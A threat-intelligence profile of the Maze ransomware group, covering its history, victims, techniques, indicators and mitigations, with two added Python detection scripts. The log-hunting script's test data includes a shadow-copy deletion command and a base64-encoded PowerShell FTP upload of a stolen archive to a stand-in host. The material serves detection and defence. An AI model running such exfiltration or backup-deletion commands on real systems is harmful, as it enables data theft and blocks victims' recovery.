dormant profile
type: Ransomware
threat_level: High (Legacy)
status: Dormant
origin: Eastern Europe — ransomware operators
last_updated: 2025-03-27

Maze Team / Twisted Spider

also known as: TWISTED SPIDER, TA2101, GOLD VILLAGE, DEV-0216, Storm-0216, TUNNEL SPIDER, UNC2198

The group that fundamentally changed ransomware economics by inventing double extortion. Before Maze, ransomware was defeatable with backups. Maze changed that: in November 2019 the operators contacted BleepingComputer to announce they had stolen Allied Universal's unencrypted data and would publish it publicly if the ransom went unpaid — creating a data breach within every ransomware incident. The tactic was copied by virtually every major ransomware operation that followed. Maze announced shutdown in October 2020 after 18 months of high-profile attacks, but strong code and TTP overlaps with Egregor and Sekhmet indicate the operators rebranded rather than retired.

attributed origin: Eastern Europe (Russia assessed)
suspected sponsor: None — financially motivated
operational period: May 2019 — October 2020
primary motivation: Financial — double extortion ransomware
primary targets: IT Services, Manufacturing, Government, Healthcare, MSPs
known victims: 100+ confirmed
mitre att&ck group: G0092 (Maze)
target regions: Global — US, Europe, UK priority
threat level: High (TTPs actively inherited)

Overview

Maze Team — tracked by CrowdStrike as TWISTED SPIDER and by Proofpoint as TA2101 — operated the Maze ransomware from May 2019 through October 2020, a period of 18 months that permanently altered the ransomware threat landscape. The malware itself began as ChaCha ransomware, first identified by Malwarebytes Director of Threat Intelligence Jérôme Segura in May 2019, before the operators rebranded and expanded operations under the Maze name.

The innovation that defined Maze was not technical sophistication — it was strategic. By November 2019, the operators had recognized that the growing adoption of offline backups was eroding ransomware's leverage. Their response was to add data theft as a prerequisite to encryption, then demonstrate follow-through by contacting BleepingComputer to announce they had exfiltrated 700GB of data from Allied Universal and would release it if payment was not made. When Allied Universal did not pay, Maze published a portion of the data — the first time a ransomware group had publicly executed this threat in such a deliberate, media-facing way. The concept spread immediately: REvil launched a leak site, DoppelPaymer and Clop followed, and by 2020 double extortion had become the industry standard for big-game hunting ransomware groups.

Beyond inventing the tactic, Maze institutionalized it. The operators created a dedicated public "Maze News" leak site, issued formal press releases about victims, and cultivated relationships with cybersecurity journalists to amplify the reputational pressure on organizations that refused to pay. In June 2020, Maze formed the Maze Cartel — a collaboration with VIKING SPIDER (Ragnar Locker) and LockBit operators to cross-host victim data on each other's leak sites, further complicating victim recovery and negotiation. The group operated as an affiliate-based RaaS, with a core development team and distributed operators conducting intrusions.

Attribution to Eastern Europe and likely Russia rests on the malware's CIS language exclusion: Maze terminates without encrypting if the system's language is set to Russian, Ukrainian, Belarusian, or the language of another former Soviet state — a standard operational security practice among Russian-origin criminal groups protecting against domestic prosecution. No core Maze operators have been publicly arrested or identified.

decryption keys released — february 2022

In February 2022, decryption keys for Maze, Egregor, and Sekhmet were released via a BleepingComputer forum post, attributed to the malware developer. Emsisoft confirmed the keys were legitimate and released a free decryptor. Analysts assessed the release was likely triggered by mounting law enforcement pressure following the arrest of REvil members, as the keys' release eliminated any lingering extortion value against unpaid victims. Any organization still holding encrypted Maze data can use Emsisoft's free decryptor to recover files.

Target Profile

Maze targeted organizations across virtually every sector during its operational period, with particular focus on large enterprises where stolen data would carry maximum reputational and regulatory leverage.

  • IT services and managed service providers: MSPs were a particularly high-value target because a single compromise could provide access to multiple client networks. The Cognizant attack in April 2020 exemplified this: as one of the world's largest IT services providers, the breach disrupted services across Cognizant's global client base simultaneously.
  • Manufacturing and industrial: Large manufacturers with proprietary designs, production schedules, and supplier relationships were targeted for both data sensitivity and operational disruption potential. Southwire, a major cable manufacturer, was an early victim in late 2019.
  • Technology and electronics: Canon, LG Electronics, and Xerox were all confirmed victims in 2020. These companies held sensitive intellectual property and faced significant reputational damage from the prospect of data leaks.
  • Government and public sector: The City of Pensacola, Florida was targeted in late 2019. Government entities were attractive due to public sector data sensitivity and the political pressure to avoid prolonged service disruption.
  • Healthcare: Despite publicly stating an aversion to attacking frontline healthcare during the COVID-19 pandemic, the group did target healthcare-adjacent organizations. The stated avoidance was operationally convenient — healthcare organizations under crisis conditions are less likely to engage fully in ransom negotiations.
  • Finance, legal, insurance, and energy: Mandiant incident response engagements documented Maze activity across financial services, legal firms, insurance companies, and energy organizations, reflecting the group's broad targeting without a single-sector focus.

Tactics, Techniques & Procedures

Maze operated as a RaaS with multiple affiliate teams conducting intrusions, leading to variation in initial access methods across observed incidents. The post-compromise phase — lateral movement, data exfiltration, and ransomware deployment — was more consistent across affiliates.

mitre id and technique: description
T1566.001 Spear-Phishing Attachment: A primary initial access method across multiple affiliate teams. Malicious Office documents with macros impersonating government agencies (German Ministry of Finance, Italian Revenue Agency) were documented in Proofpoint's TA2101 tracking. Macros downloaded Maze to %TEMP% and executed it. Italian and German targets were specifically named in early 2019 government-themed campaigns.
T1190 Exploit Public-Facing Application: Maze exploited vulnerabilities in Pulse VPN and Windows VBScript Engine Remote Code Execution to gain network footholds. These vulnerabilities were particularly valuable for targeting organizations without patched remote access infrastructure during the shift to remote work in early 2020.
T1133 External Remote Services: RDP with stolen credentials was a documented initial access vector across multiple Maze intrusions. Exposed RDP was especially relevant during the COVID-19 period when organizations rapidly deployed remote access without adequate security controls. RDP also served as a lateral movement mechanism once inside target networks.
T1059.001 PowerShell — Data Exfiltration: Base64-encoded PowerShell scripts uploaded files with .7z extensions to attacker-controlled FTP servers using hard-coded credentials. A variant of a script originally posted to Microsoft TechNet was documented across multiple incidents. WinSCP was used as an alternative exfiltration mechanism in other observed cases.
T1486 Data Encrypted for Impact: Maze used ChaCha and RSA encryption algorithms to encrypt victim files. The malware first collects system information including drive configuration, OS version, language settings, username, and computer name, varying ransom amounts based on whether the target is a home system, workstation, or enterprise server. CIS language detection terminates execution without encryption.
T1657 Financial Theft / Double Extortion: The defining innovation of the Maze operation. Data exfiltration precedes encryption, enabling a second ransom demand for non-release of stolen data. Maze was the first group to execute this publicly at scale — publishing Allied Universal's data in November 2019 after they declined to pay. The Maze News leak site published stolen data as social pressure on non-paying victims, and the group issued press releases to amplify coverage.
T1078 Valid Accounts / Credential Harvesting: Mimikatz was used post-compromise for credential dumping. Harvested credentials enabled lateral movement across domain-joined systems and escalation to domain administrator privileges required for full network compromise and mass ransomware deployment. The malware also attempted to enumerate network resources via null session connections.
T1057 Process Discovery / Network Reconnaissance: Maze performed extensive network enumeration before deploying ransomware — identifying domain controllers, backup systems, and high-value data stores to maximize exfiltration and encryption impact. BloodHound was observed in some Mandiant incident response engagements for Active Directory reconnaissance, enabling more effective privilege escalation and lateral movement planning.
T1490 Inhibit System Recovery: Maze deleted Volume Shadow Copies and targeted backup infrastructure specifically to prevent file recovery without paying the ransom. This was particularly critical given that Maze's entire value proposition rested on defeating the backup-as-defense strategy. Removing recovery options maximized the ransom leverage of the encryption component.
T1583 Infrastructure Acquisition — Cartel Data Sharing: Maze established the Maze Cartel in June 2020 — a cross-group collaboration with VIKING SPIDER (Ragnar Locker) and LockBit operators to cross-host victim data on multiple dedicated leak sites. This infrastructure arrangement meant victims faced data exposure across multiple platforms simultaneously, complicating both technical takedown efforts and ransom negotiations.

Known Campaigns

Key operations across the 18-month active period, selected for their historical significance in establishing or demonstrating the double extortion model.

Government-Themed Phishing — Germany and Italy 2019

Among the earliest documented Maze campaigns, tracked by Proofpoint as TA2101. Operators sent spam emails impersonating Germany's Bundeszentralamt für Steuern (Federal Ministry of Finance) and Italy's Agenzia Entrate (Internal Revenue Service), attaching malicious Office documents with macros. The Italian campaign used a document named VERDI.doc described as an "interactive tool," a social engineering ploy to encourage macro enabling. When macros were activated, scripts downloaded and executed Maze from the %TEMP% directory. The group also distributed Cobalt Strike in parallel campaigns using the same government impersonation infrastructure.

Allied Universal — First Public Double Extortion 2019

The defining moment in ransomware history. After encrypting Allied Universal — a major US security staffing firm — Maze operators contacted BleepingComputer to announce they had exfiltrated the company's unencrypted data and would release it if a ransom of approximately $2.3 million in Bitcoin was not paid. When Allied Universal declined to pay, the operators published 700MB of stolen data publicly — the first publicly documented execution of this threat by a ransomware group. The Maze News site was established as a permanent infrastructure for future data publication. This single action fundamentally changed the calculus of ransomware defense worldwide.

City of Pensacola, Florida 2019

Maze attacked Pensacola's municipal systems and exfiltrated 2GB of city data, publishing it as proof of compromise. The attack disrupted city services and demonstrated that public sector targets were viable double extortion victims — the public nature of government data breaches and the political pressure to restore services quickly made municipalities particularly susceptible to the new model.

Cognizant — Fortune 500 MSP Attack 2020

The April 2020 attack on Cognizant — one of the world's largest IT services providers — became the flagship example of Maze targeting MSPs for multiplied impact. The attack encrypted and disabled internal systems, forced Cognizant to take other infrastructure offline, and disrupted services for Cognizant's global client base including ING, Standard Life, Mitsubishi Motors, and PeopleSoft. Several clients proactively severed Cognizant's network access as a protective measure, effectively pausing active projects. The breach exposed personal information including Social Security numbers, tax IDs, financial data, driver's licenses, and passports. Cognizant estimated the immediate financial impact at $50–70 million — one of the highest publicly disclosed ransomware costs at that point in time.

Maze Cartel Formation — LockBit and Ragnar Locker 2020

In June 2020, Maze announced the creation of the Maze Cartel — a formal collaboration agreement with VIKING SPIDER (Ragnar Locker operators) and LockBit, under which victim data from any cartel member's attack could be hosted on multiple cartel members' leak sites simultaneously. This arrangement benefited newer or less-established operators by associating their data with Maze's established reputation, increasing the credibility of the extortion threat. It also distributed the data across multiple infrastructure points, making targeted takedowns by law enforcement or hosting providers less effective. SunCrypt claimed cartel membership in August 2020, but Maze publicly denied the claim.

Canon and Xerox — Major Corporate Targets 2020

In August 2020, Canon confirmed an attack affecting around 25 domains and multiple internal applications. Maze claimed to have exfiltrated 10TB of data. Users of Canon's free image.canon cloud storage service permanently lost data stored before June 16, 2020. Canon acknowledged the storage loss but disputed claims of image data leakage. Xerox was also hit, with Maze publishing over 100GB of Xerox data on the leak site. The Canon attack in particular drew attention to the unique damage posed by exfiltration against companies with large customer data sets — the stolen data included customer-facing service data, not just internal corporate documents.

Shutdown Announcement and Egregor Emergence 2020

In October 2020, Maze operators published a "press release" on their leak site announcing shutdown of operations, stating they had ceased encrypting new victims in September. The announcement was skeptically received: Egregor, a ransomware variant based on the Sekhmet malware family, had emerged in September 2020 — precisely as Maze began winding down — and shared Maze's ChaCha and RSA encryption algorithms, double extortion model, dedicated leak site format, and ransom note structure. Sophos and other researchers documented that Egregor affiliates were former Maze affiliates who had migrated simultaneously. The pattern matched GandCrab's earlier "retirement" followed by the emergence of REvil. Maze decryption keys were released in February 2022, providing free recovery for all victims with encrypted data.

Tools & Malware

Maze operated a mixed toolset — a proprietary ransomware payload supplemented by a broad range of legitimate administrative and penetration testing tools for post-exploitation phases.

  • Maze ransomware (ChaCha/RSA): The core ransomware payload using ChaCha stream cipher for file encryption and RSA for key protection. Evolved from ChaCha ransomware. Appends randomized file extensions to encrypted files and drops DECRYPT-FILES.txt in each affected folder. Performs system and network reconnaissance before encryption, varying ransom amounts based on system role. Terminates without encrypting if CIS language settings are detected.
  • Cobalt Strike: Commercial post-exploitation framework used consistently across Maze intrusions for lateral movement, privilege escalation, and persistent access. Cobalt Strike beacons provided command-and-control between initial compromise and final ransomware deployment — a standard BGH toolkit element shared with most contemporary ransomware groups.
  • Mimikatz: Open-source credential dumper used post-compromise to extract Windows credentials from LSASS memory, enabling domain escalation and lateral movement across AD-joined environments. Documented in multiple Mandiant incident response cases involving Maze.
  • BloodHound: Open-source Active Directory reconnaissance tool used to map trust relationships, identify shortest paths to domain administrator, and plan privilege escalation. Documented in some Mandiant Maze incident response engagements as a network mapping component.
  • WinSCP / PowerShell FTP scripts: Used for data exfiltration. PowerShell scripts encoded in base64 uploaded .7z archives to attacker-controlled FTP servers. WinSCP provided an interactive alternative for manual exfiltration. Both were observed across multiple incident response cases with minor script variations between affiliate teams.
  • Exploit kits (Fallout EK, Spelevo EK): In early campaigns before the shift to targeted post-compromise deployment, Maze was distributed via the Fallout and Spelevo exploit kits targeting Flash Player vulnerabilities on compromised or malicious websites.
  • Egregor (successor): A ransomware strain based on the Sekhmet malware family, emerging in September 2020 as Maze shut down. Shares ChaCha and RSA encryption, double extortion model, affiliate structure, and TTP patterns with Maze. Strong researcher consensus that Egregor represents a Maze rebrand. Egregor itself shut down following arrests of affiliates in Ukraine by French and Ukrainian law enforcement in February 2021.

Indicators of Compromise

Historical IOCs from documented Maze campaigns. Maze is dormant and these serve as attribution anchors and threat hunting reference material. The Emsisoft free decryptor renders encryption recovery possible for any remaining unpaid victims.

historical iocs — active threat has shifted to egregor/successor operations

Maze has been dormant since October 2020. These IOCs are provided for historical attribution and threat hunting reference only. For organizations investigating current incidents with Maze-like behavior, pivot to Egregor, Sekhmet, and successor group indicators. The TTPs documented here remain relevant because successor groups directly inherited Maze's techniques.

indicators of compromise — behavioral and structural
ransom note: DECRYPT-FILES.txt — dropped in each folder containing encrypted files
file extension: randomized alphanumeric extension appended to encrypted files (varies per victim)
behavior: vssadmin delete shadows — shadow copy deletion pre-encryption
behavior: null session network enumeration to identify domain role before encryption
exfil method: Base64 PowerShell → FTP upload of .7z archives to attacker-controlled server
exfil method: WinSCP interactive transfer to attacker FTP infrastructure
exclusion: skipped folders %windir%, %programdata%, Program Files, %appdata%\local
exclusion: skipped extensions .dll, .exe, .lnk, .sys
c2 protocol: HTTP POST on port 80 using WS2_32.dll — system info exfiltration to C2 on execution
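
As an added example (not part of the original profile, and not code from any of the vendors cited), the following Python script hunts for the behavioral indicators in the table above across constructed Sysmon-style process-creation and file-creation records: vssadmin shadow copy deletion, base64-encoded PowerShell carrying an FTP upload of a .7z archive, WinSCP execution on a host outside an admin allowlist, and creation of DECRYPT-FILES.txt. The key=value log format, host names, user names, the admin-host allowlist and the 203.0.113.10 address are all assumptions constructed for the example; only the indicator names come from the table.

```python
import base64
import re
from dataclasses import dataclass

# Hosts where interactive WinSCP use by administrators is expected (constructed allowlist).
ADMIN_JUMP_HOSTS = {"JUMP-01"}

# Constructed PowerShell body mirroring the exfiltration pattern described in the
# profile: a WebClient FTP upload of a .7z archive with hard-coded credentials.
# 203.0.113.10 is a documentation-range address, not a real server.
PS_SCRIPT = (
    "$c = New-Object System.Net.WebClient; "
    "$c.Credentials = New-Object System.Net.NetworkCredential('ftpuser', 'REDACTED'); "
    "$c.UploadFile('ftp://203.0.113.10/finance.7z', 'C:\\staging\\finance.7z')"
)
# PowerShell's -EncodedCommand takes the base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(PS_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed Sysmon-style records, one per line, key=value with quotes where values contain spaces.
SAMPLE_LOGS = [
    '2020-04-17T02:14:09Z host=WS-0142 event=ProcessCreate image=C:\\Windows\\System32\\vssadmin.exe cmdline="vssadmin delete shadows /all /quiet" user=CORP\\jdoe',
    '2020-04-17T02:14:30Z host=WS-0077 event=ProcessCreate image=C:\\Windows\\System32\\vssadmin.exe cmdline="vssadmin list shadows" user=CORP\\backupsvc',
    f'2020-04-17T02:16:41Z host=WS-0142 event=ProcessCreate image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -NoP -W Hidden -enc {ENCODED}" user=CORP\\jdoe',
    '2020-04-17T02:17:02Z host=WS-0077 event=ProcessCreate image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe Get-Process" user=CORP\\jdoe',
    '2020-04-17T02:20:15Z host=WS-0142 event=ProcessCreate image="C:\\Program Files (x86)\\WinSCP\\WinSCP.exe" cmdline="WinSCP.exe" user=CORP\\jdoe',
    '2020-04-17T02:21:00Z host=JUMP-01 event=ProcessCreate image="C:\\Program Files (x86)\\WinSCP\\WinSCP.exe" cmdline="WinSCP.exe" user=CORP\\admin1',
    '2020-04-17T02:45:57Z host=WS-0142 event=FileCreate image=C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.exe target=C:\\Users\\jdoe\\Documents\\DECRYPT-FILES.txt',
]


@dataclass
class Finding:
    host: str
    indicator: str   # short key naming the row of the IoC table that matched
    detail: str


FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
ENC_RE = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)


def parse_line(line: str) -> dict:
    """Turn a key=value record into a dict; quoted values may contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def decode_encoded_powershell(cmdline: str):
    """Return the plaintext behind a -EncodedCommand argument, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(lines=SAMPLE_LOGS) -> list:
    """Scan records for the Maze behavioral indicators and return one Finding per match."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        host = rec.get("host", "?")
        image = rec.get("image", "").lower()
        if rec.get("event") == "ProcessCreate":
            cmd = rec.get("cmdline", "")
            decoded = decode_encoded_powershell(cmd)
            # Match against the decoded script when one is present, otherwise the raw command line.
            effective = (decoded or cmd).lower()
            if image.endswith("vssadmin.exe") and "delete" in effective and "shadows" in effective:
                findings.append(Finding(host, "shadow_copy_deletion", cmd))
            if "ftp://" in effective and (".7z" in effective or "uploadfile" in effective):
                src = "decoded -EncodedCommand" if decoded else "plain command line"
                findings.append(Finding(host, "powershell_ftp_exfil", f"FTP upload of archive seen in {src}"))
            if image.endswith("winscp.exe") and host not in ADMIN_JUMP_HOSTS:
                findings.append(Finding(host, "winscp_exfil", f"WinSCP launched on non-admin host by {rec.get('user')}"))
        elif rec.get("event") == "FileCreate":
            if rec.get("target", "").upper().endswith("DECRYPT-FILES.TXT"):
                findings.append(Finding(host, "ransom_note", rec.get("target")))
    return findings


if __name__ == "__main__":
    for f in hunt():
        print(f"{f.host:8} {f.indicator:22} {f.detail}")
```

The decoding step matters more than it looks: the profile notes the exfiltration scripts were base64-encoded, so a rule that only substring-matches the raw command line for "ftp://" never fires on the line that actually carries the upload. A "vssadmin list shadows" record is deliberately included to show the rule keying on the delete verb rather than on vssadmin.exe alone.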

Mitigation & Defense

Although Maze itself is dormant, its TTPs persist directly in Egregor, Sekhmet, and the broader double-extortion ransomware ecosystem it created. These mitigations are relevant against any current ransomware operator using the model Maze established.

  • Treat every ransomware incident as a data breach: Maze's core contribution to the threat landscape is the assumption that data has been exfiltrated before encryption. Incident response plans must include data exfiltration investigation alongside ransomware remediation. Do not assume that restoring from backups eliminates the incident — the stolen data remains an independent extortion vector.
  • Patch VPN and remote access vulnerabilities promptly: Pulse VPN exploitation was a documented Maze entry path. Unpatched remote access infrastructure — VPN appliances, RDP, Citrix — remains a primary initial access vector across the entire double extortion ransomware ecosystem. Prioritize these in patch cycles and enforce MFA on all remote access.
  • Block or strictly control RDP exposure: RDP was a consistent Maze entry path. RDP should never be directly exposed to the internet. Where RDP access is required, enforce MFA, restrict source IPs via firewall rules, and monitor for authentication anomalies including off-hours access and geographically inconsistent logins.
  • Macro and Office hardening: Government-impersonation Office document campaigns were an early Maze delivery method. Disable macros from internet-originated documents via Group Policy. Deploy Attack Surface Reduction rules targeting Office macro execution. Educate users about government-impersonation lures — a tactic shared with many successor groups.
  • Offsite and immutable backup architecture: Maze specifically deleted shadow copies and targeted backup systems. Backups must be stored in locations unreachable from the production domain — air-gapped, offline, or cloud-hosted with immutability controls. Test restoration procedures regularly. The backup must be inaccessible to domain-admin-level credentials.
  • Monitor for FTP exfiltration and WinSCP usage: Alert on WinSCP execution from non-administrative systems and on PowerShell invoking FTP-related functions. Outbound FTP traffic from enterprise workstations has no legitimate use in most environments and should be blocked at the perimeter firewall.
  • Cobalt Strike and BloodHound detection: Both tools are standard in the Maze-derived ransomware playbook. EDR solutions should detect Cobalt Strike beacon injection patterns and BloodHound's SharpHound collection activity. Monitor for ADFind.exe and BloodHound/SharpHound execution as pre-ransomware reconnaissance indicators.
  • Dedicated leak site monitoring: Organizations in high-risk sectors should monitor threat intelligence feeds and dark web monitoring services that track ransomware leak sites. Early identification of data publication can inform legal, regulatory, and communication responses. Several threat intelligence platforms provide automated leak site monitoring.
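
The RDP mitigation above asks for monitoring of off-hours access and geographically inconsistent logins. As an added example that is not part of the original profile, the Python below applies both checks to constructed records shaped like Windows Security event 4624 (logon type 10 is RemoteInteractive, i.e. RDP). The source-IP-to-country table, the business-hours policy, the two-hour travel window and every account and address are assumptions built for the example; a real deployment would feed in events from the SIEM and resolve countries through a GeoIP database.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed source-IP to country lookup. In production this is a GeoIP
# database; the addresses here are documentation-range and map to nothing real.
GEO = {"203.0.113.10": "US", "198.51.100.25": "US", "192.0.2.77": "RO"}

# Constructed records carrying the 4624 fields the checks need.
# logon_type 10 is RemoteInteractive (RDP); other logon types are ignored.
SAMPLE_EVENTS = [
    {"time": "2020-04-16T09:02:11", "user": "CORP\\jdoe", "logon_type": 10, "src_ip": "203.0.113.10"},
    {"time": "2020-04-16T09:50:00", "user": "CORP\\jdoe", "logon_type": 10, "src_ip": "192.0.2.77"},
    {"time": "2020-04-16T10:15:00", "user": "CORP\\jdoe", "logon_type": 3, "src_ip": "198.51.100.25"},
    {"time": "2020-04-16T23:41:05", "user": "CORP\\jdoe", "logon_type": 10, "src_ip": "192.0.2.77"},
    {"time": "2020-04-17T01:12:48", "user": "CORP\\svc_backup", "logon_type": 10, "src_ip": "203.0.113.10"},
    {"time": "2020-04-17T08:30:00", "user": "CORP\\asmith", "logon_type": 10, "src_ip": "198.51.100.25"},
]

BUSINESS_HOURS = range(7, 19)        # 07:00-18:59 counts as in-hours (constructed policy)
TRAVEL_WINDOW = timedelta(hours=2)   # two countries inside this window is treated as inconsistent


@dataclass
class Alert:
    user: str
    kind: str    # "off_hours" or "geo_inconsistent"
    detail: str


def detect_rdp_anomalies(events=SAMPLE_EVENTS) -> list:
    """Flag RDP logons outside business hours and accounts seen from two
    countries within TRAVEL_WINDOW. Events are processed in time order, so the
    geographic check compares each logon with the account's previous RDP logon."""
    alerts = []
    last_rdp = {}   # user -> (datetime, country) of the previous RDP logon
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] != 10:
            continue
        t = datetime.fromisoformat(ev["time"])
        country = GEO.get(ev["src_ip"], "unknown")
        prev = last_rdp.get(ev["user"])
        if prev is not None and prev[1] != country and t - prev[0] <= TRAVEL_WINDOW:
            alerts.append(Alert(ev["user"], "geo_inconsistent",
                                f"{prev[1]} at {prev[0].isoformat()} then {country} at {t.isoformat()}"))
        if t.hour not in BUSINESS_HOURS:
            alerts.append(Alert(ev["user"], "off_hours",
                                f"RDP logon at {t.isoformat()} from {ev['src_ip']} ({country})"))
        last_rdp[ev["user"]] = (t, country)
    return alerts


if __name__ == "__main__":
    for a in detect_rdp_anomalies():
        print(f"{a.user:18} {a.kind:17} {a.detail}")
```

Network logons (type 3) are skipped on purpose so that ordinary file-share traffic does not pollute the RDP baseline; the geographic rule only looks back one logon per account, which keeps state small enough to run as a streaming check.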

analyst note

Maze's historical significance is that it solved a specific problem for ransomware operators — the backup problem — in a way that has proven permanently effective. Every major ransomware group operating since 2020 uses double extortion as a baseline, not an innovation. The model was replicated so rapidly because it required no technical capability beyond the ability to exfiltrate data before encrypting it, and because it converted a single ransom event into a two-vector extortion. The Maze Cartel concept also previewed the affiliate ecosystem structure — now standard across RaaS operations — where data infrastructure is shared to increase pressure on victims. Understanding Maze is prerequisite to understanding how ransomware actually works today. Its operational period ended in 2020; its influence has not.
